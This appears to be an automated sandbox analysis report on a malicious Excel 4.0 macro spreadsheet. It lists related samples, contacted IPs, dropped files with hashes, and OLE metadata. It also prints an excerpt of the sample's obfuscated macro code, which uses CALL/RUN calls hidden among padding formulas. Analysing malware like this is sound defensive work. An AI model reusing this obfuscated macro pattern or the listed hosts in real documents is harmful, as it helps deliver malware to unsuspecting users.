                                          generated purchase order 6149057.xlsmGet hashmaliciousBrowse
                                          • 192.185.32.232
                                          • 192.185.39.58
                                          fax 4044.xlsmGet hashmaliciousBrowse
                                          • 192.185.32.232
                                          • 192.185.39.58
                                          scan of document 5336227.xlsmGet hashmaliciousBrowse
                                          • 192.185.32.232
                                          • 192.185.39.58
                                          check 24994.xlsmGet hashmaliciousBrowse
                                          • 192.185.32.232
                                          • 192.185.39.58
                                          generated check 8460.xlsmGet hashmaliciousBrowse
                                          • 192.185.32.232
                                          • 192.185.39.58
                                          export of check 209162.xlsmGet hashmaliciousBrowse
                                          • 192.185.32.232
                                          • 192.185.39.58

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          File Type:Microsoft Cabinet archive data, 59863 bytes, 1 file
                                          Category:dropped
                                          Size (bytes):59863
                                          Entropy (8bit):7.99556910241083
                                          Encrypted:true
                                          SSDEEP:1536:Gs6cdy9E/ABKQPOrdweEz480zdPMHXNY/gLHfIZN:GNOqOrdDdJPAX1LHA/
                                          MD5:15775D95513782F99CDFB17E65DFCEB1
                                          SHA1:6C11F8BEE799B093F9FF4841E31041B081B23388
                                          SHA-256:477A9559194EDF48848FCE59E05105168745A46BDC0871EA742A2588CA9FBE00
                                          SHA-512:AC09CE01122D7A837BD70277BADD58FF71D8C5335F8FC599D5E3ED42C8FEE2108DD043BCE562C82BA12A81B9B08BD24B961C0961BF8FD3A0B8341C87483CD1E7
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview: MSCF............,...................I........b.........R.i .authroot.stl.qqp.4..CK..8T....c_.d....A.F....m"...AH)-.%.QIR..$t)Kd.-QQ*..~.L.2.L........sx.}...~....$....yy.A.8;....|.%OV.a0xN....9..C..t.z.,X...,..1Qj,.p.E.y..ac`.<.e.c.aZW..B.jy....^]..+)..!...r.X:.O.. ..Y..j.^.8C........n7R....p!|_.+..<...A.Wt.=. .sV..`.9O...CD./.s.\#.t#..s..Jeiu..B$.....8..(g..tJ....=,...r.d.].xqX4.......g.lF...Mn.y".W.R....K\..P.n._..7...........@pm.. Q....(#.....=.)...1..kC.`......AP8.A..<....7S.L....S...^.R.).hqS...DK.6.j....u_.0.(4g.....!,.L`......h:.a]?......J9.\..Ww........%........4E.......q.QA.0.M<.&.^*aD.....,..]*....5.....\../ d.F>.V........_.J....."....wI..'..z...j..Ds....Z...[..........N<.d.?<....b..,...n......;....YK.X..0..Z.....?...9.3.+9T.%.l...5.YK.E.V...aD.0...Y../e.7...c..g....A..=.....+..u2..X.~....O....\=...&...U.e...?...z....$.)S..T...r.!?M..;.....r,QH.B <.(t..8s3..u[.N8gL.%...v....f...W.y...cz-.EQ.....c...o..n........D*..........2.
                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):893
                                          Entropy (8bit):7.366016576663508
                                          Encrypted:false
                                          SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                                          MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                                          SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                                          SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                                          SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):326
                                          Entropy (8bit):3.134906673810585
                                          Encrypted:false
                                          SSDEEP:6:kKsupkQSN+SkQlPlEGYRMY9z+4KlDA3RUeSKyzkOt:EuphZkPlE99SNxAhUeSKO
                                          MD5:022B42B850FFEBEBE0589A8F55778533
                                          SHA1:4D43F0391DF0E3052593F463060C1B774CFD4EBC
                                          SHA-256:56179A6C3991401CD80D817F330A23341F9766568364E72BEE43C0ABD441C9FD
                                          SHA-512:2FC56CC04687B6531B2A3768B0B7D1662416586F8E6F1075F1B84B7A3DFFC9532B1C6A4F1A4D662F18D7BD2A9F7155E265E19E276808993554C4787F377C763C
                                          Malicious:false
                                          Reputation:low
                                          Preview: p...... ........./X..G..(....................................................... ...........Y5......$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".8.0.f.8.8.3.5.9.3.5.d.7.1.:.0."...
                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):252
                                          Entropy (8bit):3.0012709523256005
                                          Encrypted:false
                                          SSDEEP:3:kkFkl5dkfllXlE/jQEBllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1Ffl5nPWl9:kK2ZQE1liBAIdQZV7ulPPN
                                          MD5:81506943EB48801C4C2D3CEF39C2010C
                                          SHA1:3CE4DE32C06BDFD98964FF936BF5D8A9724EDE28
                                          SHA-256:D77D0D4C926CB389757FAF7B7F7E3C43281C85647500B770292322A52445819B
                                          SHA-512:F07E8AC7938E519B54F794A72A7D076F439AAFEE187F2D0B29008C052CBB762387AC57A46516AD6F7140EB0D26FEE134E44CEC500DFBEAAD3CAD41D980902C06
                                          Malicious:false
                                          Reputation:low
                                          Preview: p...... ....`.....#..G..(....................................................... .........|.j-......(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.b.f.8.d.f.8.0.6.2.7.0.0."...
                                          C:\Users\user\AppData\Local\Temp\C9EE0000
                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):81246
                                          Entropy (8bit):7.9064067363082735
                                          Encrypted:false
                                          SSDEEP:1536:TeKmfTW8SDcn9iZtJOXAQR2KtCbuMB/yDL4D5Kzhl4AiCb/9R:TALW8SD8YZo/Uh0GUzEif
                                          MD5:23A16496A774D2664ED6876017BC8368
                                          SHA1:9E58C1F6CEB9821853B0F1529FF2714492BFE392
                                          SHA-256:CEB3E85D6F09EA5574D2D8EBDF9C0FF6B281D9F83B6E938406127899465C3AC3
                                          SHA-512:D60F1991E4821715DB4011B6474EF85EDB194950AA9CD938D5E13791AD2605AB30A9A475E8C8945435B182D0BA71258264462EDC3C0435B69A7DAA85043442DC
                                          Malicious:false
                                          Reputation:low
                                          Preview: .U.n.0....?..........C....I?.&..an.0........%..h!..y...5..D.......J..e....o..$...;h....,>..?m.`Eh.-.S..9G......fV>Z..5v<........+..%p.N..-.?a%.M.n74.s..U?v.e......".Q...H.W+-Ay.l....A(...5M....#.D.!.'5..4....iD..G......B.R....PX.(..s..~..F..z.1..Ki..>.....$9L.5l$..$.X!..ubi..vo..(.$.r..!..&9.~..B<...j.P._.T....^&C.... .Q..J.../......ik.GD7e..H..{.A=&j.....{....5[....s.......}@j.......2..D.1i8..S..H.q..Qg.|H(P'.y9..........PK..........!..!.9............[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          C:\Users\user\AppData\Local\Temp\CabF3F1.tmp
                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          File Type:Microsoft Cabinet archive data, 59863 bytes, 1 file
                                          Category:dropped
                                          Size (bytes):59863
                                          Entropy (8bit):7.99556910241083
                                          Encrypted:true
                                          SSDEEP:1536:Gs6cdy9E/ABKQPOrdweEz480zdPMHXNY/gLHfIZN:GNOqOrdDdJPAX1LHA/
                                          MD5:15775D95513782F99CDFB17E65DFCEB1
                                          SHA1:6C11F8BEE799B093F9FF4841E31041B081B23388
                                          SHA-256:477A9559194EDF48848FCE59E05105168745A46BDC0871EA742A2588CA9FBE00
                                          SHA-512:AC09CE01122D7A837BD70277BADD58FF71D8C5335F8FC599D5E3ED42C8FEE2108DD043BCE562C82BA12A81B9B08BD24B961C0961BF8FD3A0B8341C87483CD1E7
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview: MSCF............,...................I........b.........R.i .authroot.stl.qqp.4..CK..8T....c_.d....A.F....m"...AH)-.%.QIR..$t)Kd.-QQ*..~.L.2.L........sx.}...~....$....yy.A.8;....|.%OV.a0xN....9..C..t.z.,X...,..1Qj,.p.E.y..ac`.<.e.c.aZW..B.jy....^]..+)..!...r.X:.O.. ..Y..j.^.8C........n7R....p!|_.+..<...A.Wt.=. .sV..`.9O...CD./.s.\#.t#..s..Jeiu..B$.....8..(g..tJ....=,...r.d.].xqX4.......g.lF...Mn.y".W.R....K\..P.n._..7...........@pm.. Q....(#.....=.)...1..kC.`......AP8.A..<....7S.L....S...^.R.).hqS...DK.6.j....u_.0.(4g.....!,.L`......h:.a]?......J9.\..Ww........%........4E.......q.QA.0.M<.&.^*aD.....,..]*....5.....\../ d.F>.V........_.J....."....wI..'..z...j..Ds....Z...[..........N<.d.?<....b..,...n......;....YK.X..0..Z.....?...9.3.+9T.%.l...5.YK.E.V...aD.0...Y../e.7...c..g....A..=.....+..u2..X.~....O....\=...&...U.e...?...z....$.)S..T...r.!?M..;.....r,QH.B <.(t..8s3..u[.N8gL.%...v....f...W.y...cz-.EQ.....c...o..n........D*..........2.
                                          C:\Users\user\AppData\Local\Temp\TarF3F2.tmp
                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):156386
                                          Entropy (8bit):6.3086528024913715
                                          Encrypted:false
                                          SSDEEP:1536:ZlI6c79JjgCyrYBWsWimp4Ydm6Caku2SWsz0OD8reJgMnl3XlMyGr:ZBUJcCyZfdmoku2SL3kMnBGyA
                                          MD5:78CABD9F1AFFF17BB91A105CF4702188
                                          SHA1:52FA8144D1FC5F92DEB45E53F076BCC69F5D8CC7
                                          SHA-256:C7B6743B228E40B19443E471081A51041974801D325DB4ED8FD73A1A24CBD066
                                          SHA-512:F0BF5DFBAB47CC6A3D1BF03CEC3FDDA84537DB756DA97E6D93CF08A5C750EABDFBF7FCF7EBDFFF04326617E43F0D767E5A2B7B68C548C6D9C48F36493881F62B
                                          Malicious:false
                                          Preview: 0..b...*.H.........b.0..b....1.0...`.H.e......0..R...+.....7.....R.0..R.0...+.....7........5XY._...210419201239Z0...+......0..R.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed May 12 21:39:45 2021, atime=Wed May 12 21:39:45 2021, length=8192, window=hide
                                          Category:dropped
                                          Size (bytes):867
                                          Entropy (8bit):4.489934100279667
                                          Encrypted:false
                                          SSDEEP:12:85Q+gLgXg/XAlCPCHaXEKB8VXB/7evX+WnicvbVbDtZ3YilMMEpxRljKVTdJP9TK:85w/XT0K6VXUYeFDv3q8rNru/
                                          MD5:5D80191D1F8BE805F706CAD750FD63D4
                                          SHA1:1E6BBB6393856DBB1136512606BD3A79F57B9BDE
                                          SHA-256:15DBD6C98EDA34B58D3355DA5E7331B6D78D253D5C8CE516ED7FA25B6FCCE579
                                          SHA-512:8C6487C6E820307CBC87B256AEE882D61C120F364B516543767E41B2AC15668AD71B4A15E09BEB0D64A701E9E2CDFC83B6970EF8034C02036B8448E4CAE1254A
                                          Malicious:false
                                          Preview: L..................F...........7G......G......G... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R....Desktop.d......QK.X.R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\910646\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......910646..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\afdab907_by_Libranalysis.LNK
                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed May 12 21:39:31 2021, mtime=Wed May 12 21:39:45 2021, atime=Wed May 12 21:39:45 2021, length=174080, window=hide
                                          Category:dropped
                                          Size (bytes):2168
                                          Entropy (8bit):4.577070078691255
                                          Encrypted:false
                                          SSDEEP:48:8//XT0ZVXO4OE+GVNUOE68Qh2//XT0ZVXO4OE+GVNUOE68Q/:8//XuVXbFFNUF68Qh2//XuVXbFFNUF6X
                                          MD5:A2B52A062F02B93414CD76DBA84FE6BA
                                          SHA1:94819835438CCA230B3089AF9C8767CFFE9F1C9F
                                          SHA-256:A2B21D42B3AEA8FAEEE48A308990A1405E694B3A0B8C37C1ECF49E52684718E6
                                          SHA-512:CA3C18C97D97DECE77BC8A51AEE4EDB35DB50C3AE1C5905C7848A4767A94038659E2D85867DA43258373F3B9C1B971286075B05A06BF0BD1DE162F53E0E5CB73
                                          Malicious:false
                                          Preview: L..................F.... .......G......G......G...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R...Desktop.d......QK.X.R.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......R. .AFDAB9~1.XLS..f......R.R.*...E.....................a.f.d.a.b.9.0.7._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\910646\Users.user\Desktop\afdab907_by_Libranalysis.xls.3.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.a.f.d.a.b.9.0.7._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......
                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):125
                                          Entropy (8bit):4.605232209042294
                                          Encrypted:false
                                          SSDEEP:3:oyBVomMSZGUwSLMp6lcDBEEGUwSLMp6lmMSZGUwSLMp6lv:dj6SDNiyCNbSDNf
                                          MD5:85121F807F772BC7FB4410CA5583907A
                                          SHA1:D7A223F4FE7FDEA95B5CC43B0BD686A3CD98CC1E
                                          SHA-256:BE44E6D35861347BCB4FDB71496734B6ECDA5B6C6EB8C4FA1D5311ED47AFDC7A
                                          SHA-512:30F9D464C54A9DDA0701900C234C58F0FFD5DCFC5A477FEE04FB92FA0727A10B02D37F106F7DC52FBB999B7B7C70EC3B355C4A143D5F6A281E8B41A28BF398B4
                                          Malicious:false
                                          Preview: Desktop.LNK=0..[xls]..afdab907_by_Libranalysis.LNK=0..afdab907_by_Libranalysis.LNK=0..[xls]..afdab907_by_Libranalysis.LNK=0..
                                          C:\Users\user\Desktop\8AEE0000
                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          File Type:Applesoft BASIC program data, first line number 16
                                          Category:dropped
                                          Size (bytes):205059
                                          Entropy (8bit):5.644299241850862
                                          Encrypted:false
                                          SSDEEP:3072:3l8iVBSD8YNoTU90jeoPzn3b0X7vrPlsrXvLNenLkl8i3/:rVBTrTU9i3x3/
                                          MD5:BCA119A696B5DE6D548CB8CCE7879077
                                          SHA1:7286340EAEF35B14B19777A001E4F877DA9F1821
                                          SHA-256:E9FA2130843779019E39BBA6D422E16AA110F8CA81602858881E0C8808C6A23C
                                          SHA-512:FD4E12E03E255A196F7E5387B38525154556A9403B658CF60927B4199488B576F643B4BFA926001D4B493DF6531F27C8225877303BC805FB7F75AF5DF1B174CE
                                          Malicious:false
                                          Preview: ........g2..........................\.p....user B.....a.........=...............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...,...8...........A.r.i.a.l.1.......8...........A.r.i.a.l.1.......8...........A.r.i.a.l.1.......<...........A.r.i.a.l.1.......4...........A.r.i.a.l.1.......4...........A.r.i.a.l.1...h...8...........C.a.m.b.r.i.a.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................A.r.i.a.l.1.......>...........A.r.i.a.l.1.......?...........A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...............

                                          Static File Info

                                          General

                                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: van-van, Last Saved By: vi-vi, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed May 12 08:24:11 2021, Security: 0
                                          Entropy (8bit):3.258986427712615
                                          TrID:
                                          • Microsoft Excel sheet (30009/1) 78.94%
                                          • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                          File name:afdab907_by_Libranalysis.xls
                                          File size:375808
                                          MD5:afdab90737c55a669e7025df2fa86efe
                                          SHA1:39a056a263368dcb1fb98a2226eae7c9d1488453
                                          SHA256:d61e90fe268528db7a0eee66f064270a519b2843a59642923b137ec2b81fe5e2
                                          SHA512:473d272a8270022f8a53a96ca3156aa88f751b9943264949452e3847c529af7e05cad24ee0c02a236b4e67dfa515edf0a70a3bffd5c413849add24dd72675d71
                                          SSDEEP:3072:Q8UGHv2tt/BI/s/C/i/R/7/3/UQ/OhP/2/a/1/I/T/tbHm7H9G4l+s2k3zN4sbc5:vUGAt6Uqa5DPdG9uS9QLp4l+s+E8
                                          File Content Preview:........................>......................................................................................................................................................................................................................................

                                          File Icon

                                          Icon Hash:e4eea286a4b4bcb4

                                          Static OLE Info

                                          General

                                          Document Type:OLE
                                          Number of OLE Files:1

                                          OLE File "afdab907_by_Libranalysis.xls"

                                          Indicators

                                          Has Summary Info:True
                                          Application Name:Microsoft Excel
                                          Encrypted Document:False
                                          Contains Word Document Stream:False
                                          Contains Workbook/Book Stream:True
                                          Contains PowerPoint Document Stream:False
                                          Contains Visio Document Stream:False
                                          Contains ObjectPool Stream:
                                          Flash Objects Count:
                                          Contains VBA Macros:True

                                          Summary

                                          Code Page:1251
                                          Author:van-van
                                          Last Saved By:vi-vi
                                          Create Time:2006-09-16 00:00:00
                                          Last Saved Time:2021-05-12 07:24:11
                                          Creating Application:Microsoft Excel
                                          Security:0

                                          Document Summary

                                          Document Code Page:1251
                                          Thumbnail Scaling Desired:False
                                          Contains Dirty Links:False

                                          Streams

                                          Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                          General
                                          Stream Path:\x5DocumentSummaryInformation
                                          File Type:data
                                          Stream Size:4096
                                          Entropy:0.287037498961
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c 1 . . . . . D o c 2 . . . . . D o c 3 . . . . . D o c 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b4 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 74 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 04 00 00 00
                                          Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                          General
                                          Stream Path:\x5SummaryInformation
                                          File Type:data
                                          Stream Size:4096
                                          Entropy:0.290777742057
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v a n - v a n . . . . . . . . . v i - v i . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                                          Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 363283
                                          General
                                          Stream Path:Book
                                          File Type:Applesoft BASIC program data, first line number 8
                                          Stream Size:363283
                                          Entropy:3.24522262131
                                          Base64 Encoded:True
                                          Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . v i - v i B . . . . . . . . . . . . . . . . . . . . . . . D o c 3 . . . . . . . . . . . . . . . . . . _ x l f n . A G G R E G A T E . . . . . . . . . . . . . . . . . . . . _ x l f n . F . I N V . R T . . . . ! . . . . .
                                          Data Raw:09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 05 76 69 2d 76 69 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                          Macro 4.0 Code

                                          CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU13,Doc3!BC17,0,!AL21)=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU14,Doc3!BC18&"1",0,!AL21)=RUN(Doc4!AM6)

                                          ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(before.3.5.0.sheet!AZ39&BA39&before.3.5.0.sheet!BB39&before.3.5.0.sheet!BC39,before.3.5.0.sheet!AU13)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)